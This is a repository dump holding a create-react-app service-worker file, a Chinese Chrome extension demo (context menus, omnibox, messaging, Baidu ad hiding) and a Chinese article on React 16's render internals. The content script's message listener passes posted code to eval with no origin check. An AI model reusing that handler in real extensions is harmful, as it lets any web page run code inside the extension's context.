  8 | // To learn more about the benefits of this model, read https://goo.gl/KwvDNy.
  9 | // This link also includes instructions on opting out of this behavior.
 10 | 
 11 | const isLocalhost = Boolean(
 12 |   window.location.hostname === 'localhost' ||
 13 |     // [::1] is the IPv6 localhost address.
 14 |     window.location.hostname === '[::1]' ||
 15 |     // 127.0.0.1/8 is considered localhost for IPv4.
 16 |     window.location.hostname.match(
 17 |       /^127(?:\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)){3}$/
 18 |     )
 19 | );
 20 | 
 21 | export default function register() {
 22 |   if (process.env.NODE_ENV === 'production' && 'serviceWorker' in navigator) {
 23 |     // The URL constructor is available in all browsers that support SW.
 24 |     const publicUrl = new URL(process.env.PUBLIC_URL, window.location);
 25 |     if (publicUrl.origin !== window.location.origin) {
 26 |       // Our service worker won't work if PUBLIC_URL is on a different origin
 27 |       // from what our page is served on. This might happen if a CDN is used to
 28 |       // serve assets; see https://github.com/facebookincubator/create-react-app/issues/2374
 29 |       return;
 30 |     }
 31 | 
 32 |     window.addEventListener('load', () => {
 33 |       const swUrl = `${process.env.PUBLIC_URL}/service-worker.js`;
 34 | 
 35 |       if (isLocalhost) {
 36 |         // This is running on localhost. Lets check if a service worker still exists or not.
 37 |         checkValidServiceWorker(swUrl);
 38 | 
 39 |         // Add some additional logging to localhost, pointing developers to the
 40 |         // service worker/PWA documentation.
 41 |         navigator.serviceWorker.ready.then(() => {
 42 |           console.log(
 43 |             'This web app is being served cache-first by a service ' +
 44 |               'worker. To learn more, visit https://goo.gl/SC7cgQ'
 45 |           );
 46 |         });
 47 |       } else {
 48 |         // Is not local host. Just register service worker
 49 |         registerValidSW(swUrl);
 50 |       }
 51 |     });
 52 |   }
 53 | }
 54 | 
 55 | function registerValidSW(swUrl) {
 56 |   navigator.serviceWorker
 57 |     .register(swUrl)
 58 |     .then(registration => {
 59 |       registration.onupdatefound = () => {
 60 |         const installingWorker = registration.installing;
 61 |         installingWorker.onstatechange = () => {
 62 |           if (installingWorker.state === 'installed') {
 63 |             if (navigator.serviceWorker.controller) {
 64 |               // At this point, the old content will have been purged and
 65 |               // the fresh content will have been added to the cache.
 66 |               // It's the perfect time to display a "New content is
 67 |               // available; please refresh." message in your web app.
 68 |               console.log('New content is available; please refresh.');
 69 |             } else {
 70 |               // At this point, everything has been precached.
 71 |               // It's the perfect time to display a
 72 |               // "Content is cached for offline use." message.
 73 |               console.log('Content is cached for offline use.');
 74 |             }
 75 |           }
 76 |         };
 77 |       };
 78 |     })
 79 |     .catch(error => {
 80 |       console.error('Error during service worker registration:', error);
 81 |     });
 82 | }
 83 | 
 84 | function checkValidServiceWorker(swUrl) {
 85 |   // Check if the service worker can be found. If it can't reload the page.
 86 |   fetch(swUrl)
 87 |     .then(response => {
 88 |       // Ensure service worker exists, and that we really are getting a JS file.
 89 |       if (
 90 |         response.status === 404 ||
 91 |         response.headers.get('content-type').indexOf('javascript') === -1
 92 |       ) {
 93 |         // No service worker found. Probably a different app. Reload the page.
 94 |         navigator.serviceWorker.ready.then(registration => {
 95 |           registration.unregister().then(() => {
 96 |             window.location.reload();
 97 |           });
 98 |         });
 99 |       } else {
100 |         // Service worker found. Proceed as normal.
101 |         registerValidSW(swUrl);
102 |       }
103 |     })
104 |     .catch(() => {
105 |       console.log(
106 |         'No internet connection found. App is running in offline mode.'
107 |       );
108 |     });
109 | }
110 | 
111 | export function unregister() {
112 |   if ('serviceWorker' in navigator) {
113 |     navigator.serviceWorker.ready.then(registration => {
114 |       registration.unregister();
115 |     });
116 |   }
117 | }
118 | 


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/demo/js/background.js:
--------------------------------------------------------------------------------
  1 | //-------------------- 右键菜单演示 ------------------------//
  2 | chrome.contextMenus.create({
  3 | 	title: "测试右键菜单",
  4 | 	onclick: function(){
  5 | 		chrome.notifications.create(null, {
  6 | 			type: 'basic',
  7 | 			iconUrl: 'img/icon.png',
  8 | 			title: '这是标题',
  9 | 			message: '您刚才点击了自定义右键菜单！'
 10 | 		});
 11 | 	}
 12 | });
 13 | chrome.contextMenus.create({
 14 | 	title: '使用度娘搜索：%s', // %s表示选中的文字
 15 | 	contexts: ['selection'], // 只有当选中文字时才会出现此右键菜单
 16 | 	onclick: function(params)
 17 | 	{
 18 | 		// 注意不能使用location.href，因为location是属于background的window对象
 19 | 		chrome.tabs.create({url: 'https://www.baidu.com/s?ie=utf-8&wd=' + encodeURI(params.selectionText)});
 20 | 	}
 21 | });
 22 | 
 23 | 
 24 | 
 25 | //-------------------- badge演示 ------------------------//
 26 | /*(function()
 27 | {
 28 | 	var showBadge = false;
 29 | 	var menuId = chrome.contextMenus.create({
 30 | 		title: '显示图标上的Badge',
 31 | 		type: 'checkbox',
 32 | 		checked: false,
 33 | 		onclick: function() {
 34 | 			if(!showBadge)
 35 | 			{
 36 | 				chrome.browserAction.setBadgeText({text: 'New'});
 37 | 				chrome.browserAction.setBadgeBackgroundColor({color: [255, 0, 0, 255]});
 38 | 				chrome.contextMenus.update(menuId, {title: '隐藏图标上的Badge', checked: true});
 39 | 			}
 40 | 			else
 41 | 			{
 42 | 				chrome.browserAction.setBadgeText({text: ''});
 43 | 				chrome.browserAction.setBadgeBackgroundColor({color: [0, 0, 0, 0]});
 44 | 				chrome.contextMenus.update(menuId, {title: '显示图标上的Badge', checked: false});
 45 | 			}
 46 | 			showBadge = !showBadge;
 47 | 		}
 48 | 	});
 49 | })();*/
 50 | 
 51 | // 监听来自content-script的消息
 52 | chrome.runtime.onMessage.addListener(function(request, sender, sendResponse)
 53 | {
 54 | 	console.log('收到来自content-script的消息：');
 55 | 	console.log(request, sender, sendResponse);
 56 | 	sendResponse('我是后台，我已收到你的消息：' + JSON.stringify(request));
 57 | });
 58 | 
 59 | $('#test_cors').click((e) => {
 60 | 	$.get('https://www.baidu.com', function(html){
 61 | 		console.log( html);
 62 | 		alert('跨域调用成功！');
 63 | 	});
 64 | });
 65 | 
 66 | $('#get_popup_title').click(e => {
 67 | 	var views = chrome.extension.getViews({type:'popup'});
 68 | 	if(views.length > 0) {
 69 | 		alert(views[0].document.title);
 70 | 	} else {
 71 | 		alert('popup未打开！');
 72 | 	}
 73 | });
 74 | 
 75 | // 获取当前选项卡ID
 76 | function getCurrentTabId(callback)
 77 | {
 78 | 	chrome.tabs.query({active: true, currentWindow: true}, function(tabs)
 79 | 	{
 80 | 		if(callback) callback(tabs.length ? tabs[0].id: null);
 81 | 	});
 82 | }
 83 | 
 84 | // 当前标签打开某个链接
 85 | function openUrlCurrentTab(url)
 86 | {
 87 | 	getCurrentTabId(tabId => {
 88 | 		chrome.tabs.update(tabId, {url: url});
 89 | 	})
 90 | }
 91 | 
 92 | // 新标签打开某个链接
 93 | function openUrlNewTab(url)
 94 | {
 95 | 	chrome.tabs.create({url: url});
 96 | }
 97 | 
 98 | // omnibox 演示
 99 | chrome.omnibox.onInputChanged.addListener((text, suggest) => {
100 | 	console.log('inputChanged: ' + text);
101 | 	if(!text) return;
102 | 	if(text == '美女') {
103 | 		suggest([
104 | 			{content: '中国' + text, description: '你要找“中国美女”吗？'},
105 | 			{content: '日本' + text, description: '你要找“日本美女”吗？'},
106 | 			{content: '泰国' + text, description: '你要找“泰国美女或人妖”吗？'},
107 | 			{content: '韩国' + text, description: '你要找“韩国美女”吗？'}
108 | 		]);
109 | 	}
110 | 	else if(text == '微博') {
111 | 		suggest([
112 | 			{content: '新浪' + text, description: '新浪' + text},
113 | 			{content: '腾讯' + text, description: '腾讯' + text},
114 | 			{content: '搜狐' + text, description: '搜索' + text},
115 | 		]);
116 | 	}
117 | 	else {
118 | 		suggest([
119 | 			{content: '百度搜索 ' + text, description: '百度搜索 ' + text},
120 | 			{content: '谷歌搜索 ' + text, description: '谷歌搜索 ' + text},
121 | 		]);
122 | 	}
123 | });
124 | 
125 | // 当用户接收关键字建议时触发
126 | chrome.omnibox.onInputEntered.addListener((text) => {
127 |     console.log('inputEntered: ' + text);
128 | 	if(!text) return;
129 | 	var href = '';
130 |     if(text.endsWith('美女')) href = 'http://image.baidu.com/search/index?tn=baiduimage&ie=utf-8&word=' + text;
131 | 	else if(text.startsWith('百度搜索')) href = 'https://www.baidu.com/s?ie=UTF-8&wd=' + text.replace('百度搜索 ', '');
132 | 	else if(text.startsWith('谷歌搜索')) href = 'https://www.google.com.tw/search?q=' + text.replace('谷歌搜索 ', '');
133 | 	else href = 'https://www.baidu.com/s?ie=UTF-8&wd=' + text;
134 | 	openUrlCurrentTab(href);
135 | });
136 | 
137 | // 预留一个方法给popup调用
138 | function testBackground() {
139 | 	alert('你好，我是background！');
140 | }
141 | 
142 | // 是否显示图片
143 | var showImage;
144 | chrome.storage.sync.get({showImage: true}, function(items) {
145 | 	showImage = items.showImage;
146 | });
147 | // web请求监听，最后一个参数表示阻塞式，需单独声明权限：webRequestBlocking
148 | chrome.webRequest.onBeforeRequest.addListener(details => {
149 | 	// cancel 表示取消本次请求
150 | 	if(!showImage && details.type == 'image') return {cancel: true};
151 | 	// 简单的音视频检测
152 | 	// 大部分网站视频的type并不是media，且视频做了防下载处理，所以这里仅仅是为了演示效果，无实际意义
153 | 	if(details.type == 'media') {
154 | 		chrome.notifications.create(null, {
155 | 			type: 'basic',
156 | 			iconUrl: 'img/icon.png',
157 | 			title: '检测到音视频',
158 | 			message: '音视频地址：' + details.url,
159 | 		});
160 | 	}
161 | }, {urls: ["<all_urls>"]}, ["blocking"]);


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/demo/js/content-script.js:
--------------------------------------------------------------------------------
  1 | console.log('这是content script!');
  2 | 
  3 | // 注意，必须设置了run_at=document_start 此段代码才会生效
  4 | document.addEventListener('DOMContentLoaded', function()
  5 | {
  6 | 	// 注入自定义JS
  7 | 	injectCustomJs();
  8 | 	// 给谷歌搜索结果的超链接增加 _target="blank"
  9 | 	if(location.host == 'www.google.com.tw')
 10 | 	{
 11 | 		var objs = document.querySelectorAll('h3.r a');
 12 | 		for(var i=0; i<objs.length; i++)
 13 | 		{
 14 | 			objs[i].setAttribute('_target', 'blank');
 15 | 		}
 16 | 		console.log('已处理谷歌超链接！');
 17 | 	}
 18 | 	else if(location.host == 'www.baidu.com')
 19 | 	{
 20 | 		function fuckBaiduAD()
 21 | 		{
 22 | 			if(document.getElementById('my_custom_css')) return;
 23 | 			var temp = document.createElement('style');
 24 | 			temp.id = 'my_custom_css';
 25 | 			(document.head || document.body).appendChild(temp);
 26 | 			var css = `
 27 | 			/* 移除百度右侧广告 */
 28 | 			#content_right{display:none;}
 29 | 			/* 覆盖整个屏幕的相关推荐 */
 30 | 			.rrecom-btn-parent{display:none;}'
 31 | 			/* 难看的按钮 */
 32 | 			.result-op.xpath-log{display:none !important;}`;
 33 | 			temp.innerHTML = css;
 34 | 			console.log('已注入自定义CSS！');
 35 | 			// 屏蔽百度推广信息
 36 | 			removeAdByJs();
 37 | 			// 这种必须用JS移除的广告一般会有延迟，干脆每隔一段时间清楚一次
 38 | 			interval = setInterval(removeAdByJs, 2000);
 39 | 			
 40 | 			// 重新搜索时页面不会刷新，但是被注入的style会被移除，所以需要重新执行
 41 | 			temp.addEventListener('DOMNodeRemoved', function(e)
 42 | 			{
 43 | 				console.log('自定义CSS被移除，重新注入！');
 44 | 				if(interval) clearInterval(interval);
 45 | 				fuckBaiduAD();
 46 | 			});
 47 | 		}
 48 | 		let interval = 0;
 49 | 		function removeAdByJs()
 50 | 		{
 51 | 			$('[data-tuiguang]').parents('[data-click]').remove();
 52 | 		}
 53 | 		fuckBaiduAD();
 54 | 		initCustomPanel();
 55 | 		initCustomEventListen();
 56 | 	}
 57 | });
 58 | 
 59 | function initCustomPanel()
 60 | {
 61 | 	var panel = document.createElement('div');
 62 | 	panel.className = 'chrome-plugin-demo-panel';
 63 | 	panel.innerHTML = `
 64 | 		<h2>injected-script操作content-script演示区：</h2>
 65 | 		<div class="btn-area">
 66 | 			<a href="javascript:sendMessageToContentScriptByPostMessage('你好，我是普通页面！')">通过postMessage发送消息给content-script</a><br>
 67 | 			<a href="javascript:sendMessageToContentScriptByEvent('你好啊！我是通过DOM事件发送的消息！')">通过DOM事件发送消息给content-script</a><br>
 68 | 			<a href="javascript:invokeContentScript('sendMessageToBackground()')">发送消息到后台或者popup</a><br>
 69 | 		</div>
 70 | 		<div id="my_custom_log">
 71 | 		</div>
 72 | 	`;
 73 | 	document.body.appendChild(panel);
 74 | }
 75 | 
 76 | // 向页面注入JS
 77 | function injectCustomJs(jsPath)
 78 | {
 79 | 	jsPath = jsPath || 'js/inject.js';
 80 | 	var temp = document.createElement('script');
 81 | 	temp.setAttribute('type', 'text/javascript');
 82 | 	// 获得的地址类似：chrome-extension://ihcokhadfjfchaeagdoclpnjdiokfakg/js/inject.js
 83 | 	temp.src = chrome.extension.getURL(jsPath);
 84 | 	temp.onload = function()
 85 | 	{
 86 | 		// 放在页面不好看，执行完后移除掉
 87 | 		this.parentNode.removeChild(this);
 88 | 	};
 89 | 	document.body.appendChild(temp);
 90 | }
 91 | 
 92 | // 接收来自后台的消息
 93 | chrome.runtime.onMessage.addListener(function(request, sender, sendResponse)
 94 | {
 95 | 	console.log('收到来自 ' + (sender.tab ? "content-script(" + sender.tab.url + ")" : "popup或者background") + ' 的消息：', request);
 96 | 	if(request.cmd == 'update_font_size') {
 97 | 		var ele = document.createElement('style');
 98 | 		ele.innerHTML = `* {font-size: ${request.size}px !important;}`;
 99 | 		document.head.appendChild(ele);
100 | 	}
101 | 	else {
102 | 		tip(JSON.stringify(request));
103 | 		sendResponse('我收到你的消息了：'+JSON.stringify(request));
104 | 	}
105 | });
106 | 
107 | // 主动发送消息给后台
108 | // 要演示此功能，请打开控制台主动执行sendMessageToBackground()
109 | function sendMessageToBackground(message) {
110 | 	chrome.runtime.sendMessage({greeting: message || '你好，我是content-script呀，我主动发消息给后台！'}, function(response) {
111 | 		tip('收到来自后台的回复：' + response);
112 | 	});
113 | }
114 | 
115 | // 监听长连接
116 | chrome.runtime.onConnect.addListener(function(port) {
117 | 	console.log(port);
118 | 	if(port.name == 'test-connect') {
119 | 		port.onMessage.addListener(function(msg) {
120 | 			console.log('收到长连接消息：', msg);
121 | 			tip('收到长连接消息：' + JSON.stringify(msg));
122 | 			if(msg.question == '你是谁啊？') port.postMessage({answer: '我是你爸！'});
123 | 		});
124 | 	}
125 | });
126 | 
127 | window.addEventListener("message", function(e)
128 | {
129 | 	console.log('收到消息：', e.data);
130 | 	if(e.data && e.data.cmd == 'invoke') {
131 | 		eval('('+e.data.code+')');
132 | 	}
133 | 	else if(e.data && e.data.cmd == 'message') {
134 | 		tip(e.data.data);
135 | 	}
136 | }, false);
137 | 
138 | 
139 | function initCustomEventListen() {
140 | 	var hiddenDiv = document.getElementById('myCustomEventDiv');
141 | 	if(!hiddenDiv) {
142 | 		hiddenDiv = document.createElement('div');
143 | 		hiddenDiv.style.display = 'none';
144 | 		hiddenDiv.id = 'myCustomEventDiv';
145 | 		document.body.appendChild(hiddenDiv);
146 | 	}
147 | 	hiddenDiv.addEventListener('myCustomEvent', function() {
148 | 		var eventData = document.getElementById('myCustomEventDiv').innerText;
149 | 		tip('收到自定义事件：' + eventData);
150 | 	});
151 | }
152 | 
153 | var tipCount = 0;
154 | // 简单的消息通知
155 | function tip(info) {
156 | 	info = info || '';
157 | 	var ele = document.createElement('div');
158 | 	ele.className = 'chrome-plugin-simple-tip slideInLeft';
159 | 	ele.style.top = tipCount * 70 + 20 + 'px';
160 | 	ele.innerHTML = `<div>${info}</div>`;
161 | 	document.body.appendChild(ele);
162 | 	ele.classList.add('animated');
163 | 	tipCount++;
164 | 	setTimeout(() => {
165 | 		ele.style.top = '-100px';
166 | 		setTimeout(() => {
167 | 			ele.remove();
168 | 			tipCount--;
169 | 		}, 400);
170 | 	}, 3000);
171 | }


--------------------------------------------------------------------------------
/src/react源码分析-reactDom.render.md:
--------------------------------------------------------------------------------
  1 | # react源码分析-ReactDom.render流程总览
  2 | ![原型图](https://raw.githubusercontent.com/luke93h/git-blog/master/imgs/reactDom.png)
  3 | 
  4 | ## 目录
  5 | - 前言
  6 |   - [背景](#背景)
  7 |   - [优化内容](#优化内容)
  8 | - [初始阶段](#初始阶段)
  9 |   - [jsx](#jsx)
 10 |   - [ReactDom.render](#ReactDom.render)
 11 |   - [legacyCreateRootFromDOMContainer](#legacyCreateRootFromDOMContainer)
 12 |   - [Fiber](#Fiber)
 13 | - [规划阶段](#规划阶段-scheduleWork)
 14 |   - [ExpirationTime](#ExpirationTime)
 15 |   - [priority](#priority)
 16 | - [调和阶段](#调和-reconciliation)
 17 |   - [workLoop](#workLoop)
 18 |   - [beginWork](#beginWork)
 19 |   - [completeWork](#completeWork)
 20 | - [更新阶段](#更新阶段)
 21 |   - [commitRoot](#commitRoot)
 22 | 
 23 | - [小技巧](#小技巧)
 24 | - [参考](#参考)
 25 | - [后续](#后续)
 26 | 
 27 | ## 背景
 28 | 
 29 | 距离react16发布已经过去很久了，facebook开发团队耗时2年多，究竟做了什么呢。从下面两张图中可以很直观的看出，react16带来的性能优化
 30 | ![animation1](/luke93h/git-blog/blob/master/imgs/animation1.gif?raw=true)
 31 | 
 32 | ![animation2](/luke93h/git-blog/blob/master/imgs/animation2.gif?raw=true)
 33 | 
 34 | 造成这样的现象主要是因为：单个网页由js、UI渲染线程、浏览器事件触发线程、http请求线程、EventLoop轮询的处理线程等线程组成，其中js引擎线程和ui渲染线程是互斥的，也就是说在处理js任务时，页面将停止渲染，一旦js占用时间过长，造成页面每秒渲染的帧数过低，就会给用造成很明显的卡顿感。
 35 | 
 36 | ## 优化内容
 37 | 
 38 | 1. 新增了Portals、Fragments的组件类型，新增了componentDidCatch、static getDerivedStateFromProps、getSnapshotBeforeUpdate声明周期，componentWillMount、componentWillReceiveProps、componentWillUpdate将会在未来被移除，支持自定义的dom属性，扩展了render函数可返回的类型
 39 | 
 40 | 2. 引入异步架构，优化了包括动画，布局和手势的性能。
 41 |   - 把可中断的工作拆分成小任务
 42 |   - 对正在做的工作调整优先次序、重做、复用上次（做了一半的）成果
 43 | 
 44 | 3. 项目体积大幅度缩小，相比前一个大版本，react + react-dom的体积从161.kb（49.8kb gzipped）缩减到了109kb（34.8 kb gzipped），优化幅度高达30%。
 45 | 
 46 | ## jsx
 47 | 
 48 | 编译前：
 49 | 
 50 | ```jsx
 51 | <h1 color="red">Hello, world!</h1>
 52 | ```
 53 | 
 54 | 编译后： 
 55 | 
 56 | ```jsx
 57 | React.createElement("h1", {color: "red"}, "Hello, world!")
 58 | ```
 59 | 
 60 | ## ReactDom.render
 61 | 
 62 | 将react元素渲染到真实dom中。
 63 | 
 64 | ```jsx
 65 | ReactDOM.render(
 66 |   element,
 67 |   container,
 68 |   [callback]
 69 | )
 70 | ```
 71 | [在线尝试](https://codesandbox.io/s/v629p1y197)
 72 | 
 73 | ## legacyRenderSubtreeIntoContainer
 74 | 
 75 | 这个方法除主要做了两件事：
 76 | 1. 清除dom容器元素的子元素
 77 | ```jsx
 78 | while ((rootSibling = container.lastChild)) {
 79 |     container.removeChild(rootSibling);
 80 | }
 81 | ```
 82 | 2. 创建ReactRoot对象
 83 | 
 84 | ## Fiber
 85 | 
 86 | react在进行组件渲染时，从setState开始到渲染完成整个过程是同步的（“一气呵成”）。  
 87 | 如果需要渲染的组件比较庞大，js执行会占据主线程时间较长，会导致页面响应度变差，使得react在动画、手势等应用中效果比较差。
 88 | 为了解决这个问题，react团队经过两年的工作，重写了react中核心算法——reconciliation。
 89 | 
 90 | 
 91 | ## 规划阶段-scheduleWork
 92 | 
 93 | 规划更新的过期时间和优先级
 94 | 
 95 | ## ExpirationTime
 96 | 
 97 | 在react16中，随处可见expirationTime这个值，这个值的含义是：  
 98 | - 所谓的到期时间（ExpirationTime），是相对于调度器初始调用的起始时间而言的一个时间段；调度器初始调用后的某一段时间内，需要调度完成这项更新，这个时间段长度值就是到期时间值。  
 99 | - 目前react16的异步更新和优先级更新尚未完善，因此本文对此功能将暂不做深究。
100 | 
101 | ## priority
102 | 
103 | 组件更新的优先级，react16暂未启用，不做深究。
104 | 
105 | ## 调和-reconciliation
106 | 
107 | React算法，用于计算新旧树上需要更新的部分
108 | 
109 | ## workLoop
110 | 
111 | 生成FiberTree
112 | ![FiberTree](https://github.com/luke93h/git-blog/raw/master/imgs/fiber-tree.png)
113 | 
114 | ## beginWork
115 | 
116 | 根据fiber.tag类型，更新不同的fiber节点。  
117 | 节点类型如下：
118 | ```jsx
119 | switch (workInProgress.tag) {
120 |   case IndeterminateComponent:
121 |     return mountIndeterminateComponent(current, workInProgress, renderExpirationTime);
122 |   case FunctionalComponent:
123 |     return updateFunctionalComponent(current, workInProgress);
124 |   case ClassComponent:
125 |     return updateClassComponent(current, workInProgress, renderExpirationTime);
126 |   case HostRoot:
127 |     return updateHostRoot(current, workInProgress, renderExpirationTime);
128 |   case HostComponent:
129 |     return updateHostComponent(current, workInProgress, renderExpirationTime);
130 |   case HostText:
131 |     return updateHostText(current, workInProgress);
132 |   case TimeoutComponent:
133 |     return updateTimeoutComponent(current, workInProgress, renderExpirationTime);
134 |   case HostPortal:
135 |     return updatePortalComponent(current, workInProgress, renderExpirationTime);
136 |   case ForwardRef:
137 |     return updateForwardRef(current, workInProgress);
138 |   case Fragment:
139 |     return updateFragment(current, workInProgress);
140 |   case Mode:
141 |     return updateMode(current, workInProgress);
142 |   case Profiler:
143 |     return updateProfiler(current, workInProgress);
144 |   case ContextProvider:
145 |     return updateContextProvider(current, workInProgress, renderExpirationTime);
146 |   case ContextConsumer:
147 |     return updateContextConsumer(current, workInProgress, renderExpirationTime);
148 |   default:
149 |     invariant_1(false, 'Unknown unit of work tag. This error is likely caused by a bug in React. Please file an issue.');
150 | }
151 | ```
152 | 
153 | ## completeWork
154 | 
155 | 创建dom节点，初始化dom属性
156 | 
157 | ## 更新阶段
158 | 
159 | 根据前面计算出来的更新类型，在真实dom树上执行对应的操作
160 | 
161 | ## commitRoot
162 | 
163 | 执行更新操作，分三次递归
164 | 1. commitBeforeMutationLifecycles：调用getSnapshotBeforeUpdate声明周期
165 | 2. commitAllHostEffects：执行所有会产生副作用的操作,插入、更新、移除、ref的unmount
166 | 3. commitAllLifeCycles：生命周期
167 | 
168 | ## 小技巧
169 | 
170 | - 阅读源码时，可以在本地用create-react-app新建一下小demo项目，然后直接在node_modules中的react-dom.development.js和react.development.js两个文件里的对应方法打断点。![断点图](https://raw.githubusercontent.com/luke93h/git-blog/master/imgs/breakPoint.png)
171 | 
172 | ## 参考
173 | 
174 | - [React16.2源码解析](https://juejin.im/post/5b1b4daff265da6e0f70b5a9)
175 | - [React 16 Fiber源码速览](http://zxc0328.github.io/2017/09/28/react-16-source/)
176 | - [react官方文档](https://reactjs.org/docs/react-dom.html)
177 | - [React Fiber](https://juejin.im/post/5ab7b3a2f265da2378403e57)
178 | - [React Fiber初探](http://blog.codingplayboy.com/2017/12/02/react_fiber/#alternate_fiber)
179 | - [React Fiber Architecture](https://github.com/acdlite/react-fiber-architecture)
180 | 
181 | # 后续
182 | 
183 | - [事件系统分析](https://github.com/luke93h/git-blog/issues/10)
184 | - [setState分析](https://github.com/luke93h/git-blog/issues/11)


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/demo/js/popup.js:
--------------------------------------------------------------------------------
  1 | $(function() {
  2 | 	// 加载设置
  3 | 	var defaultConfig = {color: 'white'}; // 默认配置
  4 | 	chrome.storage.sync.get(defaultConfig, function(items) {
  5 | 		document.body.style.backgroundColor = items.color;
  6 | 	});
  7 | 
  8 | 	// 初始化国际化
  9 | 	$('#test_i18n').html(chrome.i18n.getMessage("helloWorld"));
 10 | 
 11 | 
 12 | });
 13 | 
 14 | // 打开后台页
 15 | $('#open_background').click(e => {
 16 | 	window.open(chrome.extension.getURL('background.html'));
 17 | });
 18 | 
 19 | // 调用后台JS
 20 | $('#invoke_background_js').click(e => {
 21 | 	var bg = chrome.extension.getBackgroundPage();
 22 | 	bg.testBackground();
 23 | });
 24 | 
 25 | // 获取后台页标题
 26 | $('#get_background_title').click(e => {
 27 | 	var bg = chrome.extension.getBackgroundPage();
 28 | 	alert(bg.document.title);
 29 | });
 30 | 
 31 | // 设置后台页标题
 32 | $('#set_background_title').click(e => {
 33 | 	var title = prompt('请输入background的新标题：', '这是新标题');
 34 | 	var bg = chrome.extension.getBackgroundPage();
 35 | 	bg.document.title = title;
 36 | 	alert('修改成功！');
 37 | });
 38 | 
 39 | // 自定义窗体大小
 40 | $('#custom_window_size').click(() => {
 41 | 	chrome.windows.getCurrent({}, (currentWindow) => {
 42 | 		var startLeft = 10;
 43 | 		chrome.windows.update(currentWindow.id, 
 44 | 		{
 45 | 			left: startLeft * 10,
 46 | 			top: 100,
 47 | 			width: 800,
 48 | 			height: 600
 49 | 		});
 50 | 		var inteval = setInterval(() => {
 51 | 			if(startLeft >= 40) clearInterval(inteval);
 52 | 			chrome.windows.update(currentWindow.id, {left: (++startLeft) * 10});
 53 | 		}, 50);
 54 | 	});
 55 | });
 56 | 
 57 | // 最大化窗口
 58 | $('#max_current_window').click(() => {
 59 | 	chrome.windows.getCurrent({}, (currentWindow) => {
 60 | 		// state: 可选 'minimized', 'maximized' and 'fullscreen' 
 61 | 		chrome.windows.update(currentWindow.id, {state: 'maximized'});
 62 | 	});
 63 | });
 64 | 
 65 | 
 66 | // 最小化窗口
 67 | $('#min_current_window').click(() => {
 68 | 	chrome.windows.getCurrent({}, (currentWindow) => {
 69 | 		// state: 可选 'minimized', 'maximized' and 'fullscreen' 
 70 | 		chrome.windows.update(currentWindow.id, {state: 'minimized'});
 71 | 	});
 72 | });
 73 | 
 74 | // 打开新窗口
 75 | $('#open_new_window').click(() => {
 76 | 	chrome.windows.create({state: 'maximized'});
 77 | });
 78 | 
 79 | // 关闭全部
 80 | $('#close_current_window').click(() => {
 81 | 	chrome.windows.getCurrent({}, (currentWindow) => {
 82 | 		chrome.windows.remove(currentWindow.id);
 83 | 	});
 84 | });
 85 | 
 86 | // 新标签打开网页
 87 | $('#open_url_new_tab').click(() => {
 88 | 	chrome.tabs.create({url: 'https://www.baidu.com'});
 89 | });
 90 | 
 91 | // 当前标签打开网页
 92 | $('#open_url_current_tab').click(() => {
 93 | 	getCurrentTabId(tabId => {
 94 | 		chrome.tabs.update(tabId, {url: 'http://www.so.com'});
 95 | 	});
 96 | });
 97 | 
 98 | // 获取当前标签ID
 99 | $('#get_current_tab_id').click(() => {
100 | 	getCurrentTabId(tabId => {
101 | 		alert('当前标签ID：' + tabId);
102 | 	});
103 | });
104 | 
105 | // 高亮tab
106 | $('#highlight_tab').click(() => {
107 | 	chrome.tabs.highlight({tabs: 0});
108 | });
109 | 
110 | // popup主动发消息给content-script
111 | $('#send_message_to_content_script').click(() => {
112 | 	sendMessageToContentScript('你好，我是popup！', (response) => {
113 | 		if(response) alert('收到来自content-script的回复：'+response);
114 | 	});
115 | });
116 | 
117 | // 监听来自content-script的消息
118 | chrome.runtime.onMessage.addListener(function(request, sender, sendResponse)
119 | {
120 | 	console.log('收到来自content-script的消息：');
121 | 	console.log(request, sender, sendResponse);
122 | 	sendResponse('我是popup，我已收到你的消息：' + JSON.stringify(request));
123 | });
124 | 
125 | // popup与content-script建立长连接
126 | $('#connect_to_content_script').click(() => {
127 | 	getCurrentTabId((tabId) => {
128 | 		var port = chrome.tabs.connect(tabId, {name: 'test-connect'});
129 | 		port.postMessage({question: '你是谁啊？'});
130 | 		port.onMessage.addListener(function(msg) {
131 | 			alert('收到长连接消息：'+msg.answer);
132 | 			if(msg.answer && msg.answer.startsWith('我是'))
133 | 			{
134 | 				port.postMessage({question: '哦，原来是你啊！'});
135 | 			}
136 | 		});
137 | 	});
138 | });
139 | 
140 | // 获取当前选项卡ID
141 | function getCurrentTabId(callback)
142 | {
143 | 	chrome.tabs.query({active: true, currentWindow: true}, function(tabs)
144 | 	{
145 | 		if(callback) callback(tabs.length ? tabs[0].id: null);
146 | 	});
147 | }
148 | 
149 | // 这2个获取当前选项卡id的方法大部分时候效果都一致，只有少部分时候会不一样
150 | function getCurrentTabId2()
151 | {
152 | 	chrome.windows.getCurrent(function(currentWindow)
153 | 	{
154 | 		chrome.tabs.query({active: true, windowId: currentWindow.id}, function(tabs)
155 | 		{
156 | 			if(callback) callback(tabs.length ? tabs[0].id: null);
157 | 		});
158 | 	});
159 | }
160 | 
161 | // 向content-script主动发送消息
162 | function sendMessageToContentScript(message, callback)
163 | {
164 | 	getCurrentTabId((tabId) =>
165 | 	{
166 | 		chrome.tabs.sendMessage(tabId, message, function(response)
167 | 		{
168 | 			if(callback) callback(response);
169 | 		});
170 | 	});
171 | }
172 | 
173 | // 向content-script注入JS片段
174 | function executeScriptToCurrentTab(code)
175 | {
176 | 	getCurrentTabId((tabId) =>
177 | 	{
178 | 		chrome.tabs.executeScript(tabId, {code: code});
179 | 	});
180 | }
181 | 
182 | 
183 | // 演示2种方式操作DOM
184 | 
185 | // 修改背景色
186 | $('#update_bg_color').click(() => {
187 | 	executeScriptToCurrentTab('document.body.style.backgroundColor="red";')
188 | });
189 | 
190 | // 修改字体大小
191 | $('#update_font_size').click(() => {
192 | 	sendMessageToContentScript({cmd:'update_font_size', size: 42}, function(response){});
193 | });
194 | 
195 | // 显示badge
196 | $('#show_badge').click(() => {
197 | 	chrome.browserAction.setBadgeText({text: 'New'});
198 | 	chrome.browserAction.setBadgeBackgroundColor({color: [255, 0, 0, 255]});
199 | });
200 | 
201 | // 隐藏badge
202 | $('#hide_badge').click(() => {
203 | 	chrome.browserAction.setBadgeText({text: ''});
204 | 	chrome.browserAction.setBadgeBackgroundColor({color: [0, 0, 0, 0]});
